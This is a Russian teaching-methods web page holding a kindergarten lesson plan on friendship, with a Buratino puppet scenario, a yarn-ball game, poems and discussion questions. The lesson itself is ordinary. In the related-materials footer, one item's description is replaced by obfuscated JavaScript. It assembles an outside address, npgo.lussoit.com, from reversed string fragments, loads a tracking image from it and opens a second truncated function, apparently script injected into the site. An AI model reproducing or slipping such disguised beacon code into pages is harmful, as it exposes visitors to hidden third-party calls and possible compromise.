Беседа "Как правильно дружить..."
методическая разработка (старшая, подготовительная группа) на тему
Предварительный просмотр:
Беседа «Как правильно дружить…»
(для детей старшей и подготовительной группы)
Цель: Уточнить представления детей о том, что значит «уметь дружить», научить осмысливать и оценивать ситуацию, самостоятельно понимать мотивы поведения и соотносить эти мотивы существующим нормам поведения, познакомить с пословицами и поговорками о дружбе.
Материалы: Игрушка Буратино, записи песен В. Шаинского «Если с другом вышел в путь», «Настоящий друг», клубок ниток, телевизор, мультфильм «Мир похож на цветной луг» на DVD
Предварительная работа: Оформление книги о дружбе, заучивание стихов, песен о дружбе. Чтение и обсуждение рассказов о дружбе, разучивание коммуникативной игры «Клубочек».
Ход беседы:
1. Решение проблемы.
Дети стоят в кругу с воспитателем.
Воспитатель: Ребята, представляете. Прихожу я сегодня на работу, вдруг слышу, как под дверью кто-то пищит. Угадайте, кого я увидела?
У отца был мальчик странный,
Необычный, деревянный.
Всюду нос суёт он длинный.
Кто же это? (Буратино).
Отгадали! Молодцы! Буратино рассказал мне такую историю. Он с Мальвиной сидел на полянке. Буратино рисовал, а Мальвина сматывала нитки в клубок. Буратино так старался. Что весь перемазался в краске. Мальвина – известная чистюля. Попросила Буратино пойти умыться. А он заупрямился, рассердился на неё, отобрал у неё вот этот клубок ниток и убежал искать себе новых друзей. Вот так он попал в наш детский сад.
Воспитатель: Буратино, зачем ты отобрал у Мальвины клубок?
Буратино: Не знаю, просто так.
Воспитатель: А давай мы с ребятами покажем тебе, как можно поиграть с этим клубочком.
Буратино: Ой, как интересно!
Проводится игра «Клубочек» (по кругу)
Посмотрите. Ребята, на клубочек. Сейчас я возьму его в левую руку, обмотаю вокруг большого пальца, потом передам Варе, которая стоит справа от меня. (Дети по очереди дублируют действия воспитателя, а воспитатель направляет детей).
Воспитатель: И снова клубочек вернулся ко мне. Ниточка не порвалась, она состоит из множества тонких нитей, которые переплелись вместе и стали прочными и крепкими. Так и у нас: ниточка связала нас, и дружба наша стала крепче.
Собрались все дети в круг
Ты мой друг и я твой друг.
Вместе за руки возьмёмся
И друг другу улыбнёмся.
(Воспитатель сматывает нитки, дети рассаживаются на коврике).
2. Беседа.
Воспитатель: Ребята, а как вы думаете, правильно поступил Буратино, отобрав у Мальвины клубок?
Дети: Нет, не правильно. Он обидел Мальвину.
Воспитатель: Да, так настоящие друзья не поступают никогда. Я надеюсь, что Буратино извинится и помирится с Мальвиной. А сейчас, пусть Буратино останется у нас и послушает что же такое «дружба» и кто такой «настоящий друг».
Буратино: Конечно, я останусь, мне очень-очень всё это хочется узнать.
Воспитатель: Вадим, а у тебя есть друг?
Толя: Да. У меня есть друг, его зовут…
(спросить несколько детей)
Воспитатель: Почему вы считаете их хорошими друзьями?
Дети: (ответы детей) Мой друг хороший. Он делится игрушками. Мой друг никогда меня не обижает, помогает мне. Он весёлый и добрый…
Воспитатель: А как ты ласково называешь друга?
(Ответы детей).
Воспитатель: А может ли твоим другом быть взрослый человек? (бабушка, папа, мама, дедушка)
Дети: Да, ведь они нас любят, заботятся о нас, читают нам книги. Учат нас, покупают нам игрушки, конфеты…
Воспитатель: Как вы думаете. Может ли собака быть вашим другом?
Дети: Да, может. Она защищает нас от злых людей, играет с нами. Другом может быть любое домашнее животное, которое живёт в доме.
Воспитатель: Что нужно делать, чтобы дружба была крепкая?
Дети: Надо не ссориться, делиться игрушками. Помогать друг другу, заботиться о друзьях…
Воспитатель: Молодцы, вы хорошо рассказали, как надо дружить. Тот, кто хорошо дружит – не ссорится, делиться игрушками, заботится о товарищах, а если друг не знает, как поступить правильно, поможет ему, научит. Если друг вдруг загрустил – придумает, как его развеселить.
Друг
Друг - это тот, кто тебя понимает.
Друг - это тот, кто с тобою страдает.
Друг не покинет тебя никогда
Друг остается с тобой навсегда.
Друг никогда тебя не обидит,
Друг - это тот, кто тебя насквозь видит.
И если с тобой приключится беда,
Только от друга жди помощь тогда...
Друг и советом мудрым поможет,
Если тебя изнутри что-то гложит.
И если вдруг стало тебе "горячо",
Ты обопрись на друга плечо.
Лишь другу ты можешь доверить секрет,
Ведь между друзьями предательства нет.
И тот у кого миллионы друзей,
Намного богаче всех королей.
И даже когда никого нет вокруг
Незримо с тобою твой лучший друг...
Не думайте, что если вы поменяете друга, новый будет лучше. В пословице говориться: «Старый друг, лучше новых двух».
Буратино, ты понял, о чём говорили ребята?
Буратино: Понял. Надо друзей беречь, не обижать их.
3. Физкультминутка.
Подойдите к своему другу, возьмите его за руку и мы вместе со своими друзьями отправимся в путь (инсценировка песни «Если с другом вышел в путь»).
4. Моделирование ситуаций.
(Дети садятся на стульчики).
Воспитатель: А сейчас мы с вами вместе обсудим некоторые ситуации.
1. Чтение стихотворения:
Подарок
Елена Благинина
Пришла ко мне подружка,
И мы играли с ней.
И вот одна игрушка
Вдруг приглянулась ей:
Лягушка заводная,
Весёлая, смешная.
Мне скучно без игрушки -
Любимая была, -
А всё-таки подружке
Лягушку отдала.
Правильно ли поступила девочки? Как ты будешь вести себя в этом случае?
2.Твой друг заболел. Что ты будешь делать?
3. Как поведёт себя ваш друг, если вы попадёте в беду?
5. Традиция группы.
Давайте встанем в круг, положим, друг другу руки на плечи и скажем наше ежедневное приветствие:
Только смелый и упорный
Доберётся к цели бодро.
А ещё в дороге нужно:
Знать секреты прочной дружбы.
Один за всех, все за одного.
6. Домашнее задание. Заключение.
Воспитатель: Ребята, было бы очень хорошо, если бы вы с папами и мамами выучили новые пословицы и поговорки о дружбе. Договорились? Это ваше домашнее задание. А теперь я предлагаю вам посмотреть фрагмент мультфильма «Мир похож на цветной луг».
По теме: методические разработки, презентации и конспекты
Конспект занятия по психологии в разновозрастной группе "Как правильно дружить"
Задачи:1. Совместно с учащимися обсудить нравственное понимание ими истинной и мнимой дружбы и ее значение в жизни каждого человека.2. Способствовать формированию умения высказывать свое мнение ...
Проект "Дружу со звуками, говорю правильно"
Проект направлен на повышение родительской компетентности в вопросах речевого развития Своевременное овладение правильной, чистой речью имеет важное значение в формировании полноценной личности....
Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».
Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Я с детства с книгами дружу. Как правильно выбирать книги для детей 6–7 лет.
Я с детства с книгами дружу. Как правильно выбирать книги для детей 6–7 лет....
Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»
Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...
Проект "Я с грамматикой дружу, все вам правильно скажу"
Создание эффективных условий для формирования лексико-грамматических категорий у детей с ТНР....